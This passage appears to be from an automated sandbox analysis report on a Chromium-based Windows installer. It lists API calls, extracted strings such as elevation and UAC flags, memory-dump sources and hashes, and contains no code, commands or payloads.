                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,0c0f0f0d-6434-4cfd-a5e9-23e9ca4d94b6,?,?,?), ref: 0084916B
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,fef32d6d-67e9-4654-b314-6c72098ff5d1,?,?,?), ref: 00849178
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$CreateEvent$CurrentProcess
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$0c0f0f0d-6434-4cfd-a5e9-23e9ca4d94b6$<$@$butt$fake_browser_arc$fef32d6d-67e9-4654-b314-6c72098ff5d1$ked_$parent-installer-process-id$run-as-admin$setup-cmd-line$uac_declined
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$CurrentProcess
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$Elevated run is necessary but silent instalation is requested - UAC will not be shown.$Found non install-switch:$NeedStartThisProcessAsAdmin$Run-as-admin functionality is already enabled.$User is not in admin group.$Windows version is not suitable for elevated restart.$run-as-admin$silent$uac-enabled
                                                                                                                        APIs
                                                                                                                        • SetDllDirectoryW.KERNEL32(0094335A), ref: 008BC484
                                                                                                                          • Part of subcall function 00930140: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00930177
                                                                                                                          • Part of subcall function 00930140: GetLastError.KERNEL32 ref: 00930181
                                                                                                                        • _strlen.LIBCMT ref: 008BC504
                                                                                                                        • _strlen.LIBCMT ref: 008BC59E
                                                                                                                        • _strlen.LIBCMT ref: 008BC861
                                                                                                                        Strings
                                                                                                                        • run-as-admin, xrefs: 008BC4FF, 008BC553, 008BC55A, 008BC56B
                                                                                                                        • spawned_in_protected_dir, xrefs: 008BC599, 008BC5F0, 008BC5F7, 008BC608, 008BC85C, 008BC8B5, 008BC8BC, 008BC8CD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008BC9AD
                                                                                                                        • *.dll, xrefs: 008BC687
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BC9B4
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008BC9A6
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$DirectoryErrorFileLastModuleName
                                                                                                                        • String ID: *.dll$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$run-as-admin$spawned_in_protected_dir
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,?,?,SystemTemp,0000000A,?,00000000), ref: 0089EDBC
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: ChromiumTemp$GetOrCreateSecureSystemTemp$GetSecureSystemTemp$PathExists$SystemTemp$SystemTemp$Temp$file_util_win.cc
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B6D3E
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B6D45, 008B6EBB
                                                                                                                        • FeatureList-feature-accessed-too-early, xrefs: 008B69F1
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008B6D4C
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008B6EAD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B6EB4
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B69C7
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008B6E9E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header_strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$FeatureList-feature-accessed-too-early
                                                                                                                        • API String ID: 218057889-998176601
                                                                                                                        APIs
                                                                                                                        • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B03A2
                                                                                                                        • WriteFile.KERNEL32(?,?,FFFFFFFF,00000000), ref: 008B0462
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008B04D3
                                                                                                                        Strings
                                                                                                                        • LOG_FATAL, xrefs: 008B04ED
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B0487
                                                                                                                        • W, xrefs: 008B0293
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 008B0471
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B0478
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B046A
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugFileInit_thread_headerOutputStringWrite
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range$LOG_FATAL$W
                                                                                                                        • API String ID: 2021787345-2015273307
                                                                                                                        APIs
                                                                                                                        • _strlen.LIBCMT ref: 0085AC18
                                                                                                                        • _strlen.LIBCMT ref: 0085ACA1
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,?,?,00000000), ref: 0085AE2E
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000D), ref: 0085AE39
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor_strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$program-files-installation$promostat$system-level$uac
                                                                                                                        • API String ID: 2631407230-3225624203
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 00894D4D
                                                                                                                        • __Init_thread_header.LIBCMT ref: 00894F85
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalInit_thread_headerSection$EnterLeave
                                                                                                                        • String ID: Friday$Monday$Saturday$Sunday$Thursday$Tuesday$Wednesday
                                                                                                                        • API String ID: 3100837274-1471634407
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 008A047F
                                                                                                                          • Part of subcall function 008CE2A0: __Init_thread_header.LIBCMT ref: 008CE2D9
                                                                                                                          • Part of subcall function 008CE2A0: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,008A048D), ref: 008CE2FB
                                                                                                                          • Part of subcall function 008CE2A0: GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 008CE307
                                                                                                                          • Part of subcall function 008CE2A0: GetCurrentProcess.KERNEL32(?,?,008A048D), ref: 008CE31C
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 008A04E6
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 008A0504
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 008A0583
                                                                                                                          • Part of subcall function 008A08C0: GetCurrentProcess.KERNEL32(?,?,?,008A06F2), ref: 008A08CE
                                                                                                                          • Part of subcall function 008A08C0: K32GetProcessMemoryInfo.KERNEL32(00000000,?,0000002C,?,008A06F2), ref: 008A08D7
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 008A075E
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 008A0860
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 008A0878
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 008A088E
                                                                                                                        • GetLastError.KERNEL32 ref: 008A089F
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 008A08B3
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$ErrorLast$Handle$AddressCloseInfoInit_thread_headerMemoryModuleNextOpenProcProcess32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4004825158-0
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 008C6DCC
                                                                                                                        • GetLastError.KERNEL32(Failed to destroy crypt key, error: ,00952FE8,00000001,Cleanup,0000007A,?), ref: 008C6E04
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: Cleanup$Failed to destroy crypt key, error: $Failed to destroy, error: $Failed to release crypt context, error:
                                                                                                                        • API String ID: 1452528299-3823038814
                                                                                                                        • Opcode ID: db674add04ceee5c866370516e85a8d3d909efab7fa521896c658d983140c43f
                                                                                                                        • Instruction ID: a374e26e81638a22623840b9fb8649bbf9d353bfe030bb86ccd8ddc877277cdc
                                                                                                                        • Opcode Fuzzy Hash: db674add04ceee5c866370516e85a8d3d909efab7fa521896c658d983140c43f
                                                                                                                        • Instruction Fuzzy Hash: 1551A471608341AFD710EB65DC82F2B7BA5FF81B04F04482CF995D6292EB71E9189B63
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FC8C6
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008FC85D
                                                                                                                        • string_view::substr, xrefs: 008FC8BC
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr, xrefs: 008FC892
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008FC87B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FC8D5
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008FC86C
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr$string_view::substr
                                                                                                                        • API String ID: 0-3127841957
                                                                                                                        • Opcode ID: c4ae254353baaddcbba725211c2d8eb896d3ef980661cebeb26eb6ca14a305b8
                                                                                                                        • Instruction ID: bed7099c0d250f5106ef4cbda4c2c0e2123f6f6eda67f5483a238fc5c4ff9f1f
                                                                                                                        • Opcode Fuzzy Hash: c4ae254353baaddcbba725211c2d8eb896d3ef980661cebeb26eb6ca14a305b8
                                                                                                                        • Instruction Fuzzy Hash: 92D18271E0020E8BCB18DF78C990ABEB7B2FF98354F25812DE515E7241DB31AA45CB54
                                                                                                                        APIs
                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,008B0BE9,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 008B0908
                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008B0947
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,008B0BE9,?,?), ref: 008B0A73
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B0A43
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B0A4A
                                                                                                                        • (0x%lX), xrefs: 008B0958
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B0A3C
                                                                                                                        • Error (0x%lX) while retrieving error. (0x%lX), xrefs: 008B0A7B
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                        • String ID: (0x%lX)$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Error (0x%lX) while retrieving error. (0x%lX)
                                                                                                                        • API String ID: 1365068426-2802836808
                                                                                                                        • Opcode ID: 1584adc09b2c134a77bdab71d08e31c15fdc01ca0c0636eedf8f71b80406a3ad
                                                                                                                        • Instruction ID: 25d534f37e499b5553e1e4156c2385cd32d1c500950b83fe840c613bd47519a0
                                                                                                                        • Opcode Fuzzy Hash: 1584adc09b2c134a77bdab71d08e31c15fdc01ca0c0636eedf8f71b80406a3ad
                                                                                                                        • Instruction Fuzzy Hash: FA41A3B1E04329AEDF009BA4CC45AFFBB78FF85704F044425F905F6252D730AA458BA2
                                                                                                                        APIs
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,0092E400,00000409,?,00000400,00000000), ref: 0092E2DA
                                                                                                                        • GetModuleHandleW.KERNEL32(wininet.dll), ref: 0092E308
                                                                                                                        • FormatMessageW.KERNEL32(00000800,00000000,0092E400,00000409,?,00000400,00000000), ref: 0092E326
                                                                                                                        • GetModuleHandleW.KERNEL32(urlmon.dll), ref: 0092E335
                                                                                                                        • FormatMessageW.KERNEL32(00000800,00000000,0092E400,00000409,?,00000400,00000000), ref: 0092E353
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: FormatMessage$HandleModule
                                                                                                                        • String ID: unknown error 0x$urlmon.dll$wininet.dll
                                                                                                                        • API String ID: 1246395562-2593042846
                                                                                                                        • Opcode ID: 5b9abc322bcf2eba12c21dee529d9997df70933548f2c3a6337342f717c0f3ad
                                                                                                                        • Instruction ID: 17f1e5e0c13562c9a5c117e307bf86686d80a2a0fdbc41def4af55e5dfb9f9f6
                                                                                                                        • Opcode Fuzzy Hash: 5b9abc322bcf2eba12c21dee529d9997df70933548f2c3a6337342f717c0f3ad
                                                                                                                        • Instruction Fuzzy Hash: 423127B07443187EEB106B61AC4AFBB366DEF80B45F088424F646AA1C1DFB09C408BE5
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 008E449C
                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 008E44A4
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentWow64
                                                                                                                        • String ID: $OutOfMemory$ize$mit$partition_root.cc$size
                                                                                                                        • API String ID: 1905925150-2901852355
                                                                                                                        • Opcode ID: cf5c6400c8bfb6c7d029d8b4f441c923a28cb51235681cb6aea63433a57f0e04
                                                                                                                        • Instruction ID: 5624b7d33f514a41fdfb5b57f9f4e530b6927c34f4afbe53954c50c75ba54ba3
                                                                                                                        • Opcode Fuzzy Hash: cf5c6400c8bfb6c7d029d8b4f441c923a28cb51235681cb6aea63433a57f0e04
                                                                                                                        • Instruction Fuzzy Hash: D0417DB49103409FD7049F29D889956BBE8FF8A308B19C46DE54DCB322D772D905CB92
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00848903
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00848925
                                                                                                                        • GetLastError.KERNEL32 ref: 00848934
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,00000000), ref: 008489AC
                                                                                                                        • GetLastError.KERNEL32 ref: 008489BE
                                                                                                                        Strings
                                                                                                                        • The elevated installer was terminated due to stop event., xrefs: 00848969
                                                                                                                        • RunModule, xrefs: 00848954, 008489DE
                                                                                                                        • Failed to get exit code of the elevated installer., xrefs: 008489F3
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CodeEventExitMultipleObjectsProcessWait
                                                                                                                        • String ID: Failed to get exit code of the elevated installer.$RunModule$The elevated installer was terminated due to stop event.
                                                                                                                        • API String ID: 3441567390-426593179
                                                                                                                        • Opcode ID: 0300cf8c979effec312d1236d2606caa411bef8a41f7570691d1b5287713d754
                                                                                                                        • Instruction ID: 77b63323d2884c15357eb7d8fffb3437c024436a5ab5b721da3b92f677a6c1d8
                                                                                                                        • Opcode Fuzzy Hash: 0300cf8c979effec312d1236d2606caa411bef8a41f7570691d1b5287713d754
                                                                                                                        • Instruction Fuzzy Hash: B73107B1608305AFDB10AB74DC46B2E7FA9FF80B14F004528F959D61D2DB70A905CB93
                                                                                                                        APIs
                                                                                                                        • SetDllDirectoryW.KERNEL32(0094335A), ref: 008BCA04
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00832E5D,?), ref: 008BCA16
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 008BCA1E
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00832E5D,?), ref: 008BCA27
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008BCA2F
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc$Directory
                                                                                                                        • String ID: SetDefaultDllDirectories$SetSearchPathMode$kernel32.dll
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00915125: CreateFileW.KERNEL32(00000000,00000000,?,00914DC9,?,?,00000000,?,00914DC9,00000000,0000000C), ref: 00915142
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00914E34
                                                                                                                        • __dosmaperr.LIBCMT ref: 00914E3B
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00914E47
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00914E51
                                                                                                                        • __dosmaperr.LIBCMT ref: 00914E5A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00914E7A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00914FC7
                                                                                                                        • GetLastError.KERNEL32 ref: 00914FF9
                                                                                                                        • __dosmaperr.LIBCMT ref: 00915000
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,009659FC), ref: 0089C77E
                                                                                                                        • TerminateProcess.KERNEL32(10CDDB50,?,?,?,?,?,009659FC), ref: 0089C786
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C79C
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0089C7A8
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,009659FC), ref: 0089C7DA
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,009659FC), ref: 0089C7E6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,009659FC), ref: 0089C7F2
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C811
                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 0089C81C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$ObjectSingleWait$CodeErrorExitLastTerminate
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0596419B
                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 059642A9
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 059643FB
                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 05964416
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        APIs
                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0091CA87
                                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0091CBE6
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0091CCE7
                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0091CD02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0089B0E2
                                                                                                                        Strings
                                                                                                                        • UBR, xrefs: 0089B1A4
                                                                                                                        • DisplayVersion, xrefs: 0089B1B4
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089B2B1
                                                                                                                        • ReleaseId, xrefs: 0089B1D8
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0089AFF7
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089B2B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentProcess
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$DisplayVersion$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                        APIs
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 008CE82C
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008CE8C8
                                                                                                                        Strings
                                                                                                                        • win_clang_x, xrefs: 008CEBEF
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008CEE47
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008CEE4E
                                                                                                                        • MZx, xrefs: 008CE873
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$SystemWindows
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$MZx$win_clang_x
                                                                                                                        • API String ID: 1773879505-3272112235
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 00894981
                                                                                                                        Strings
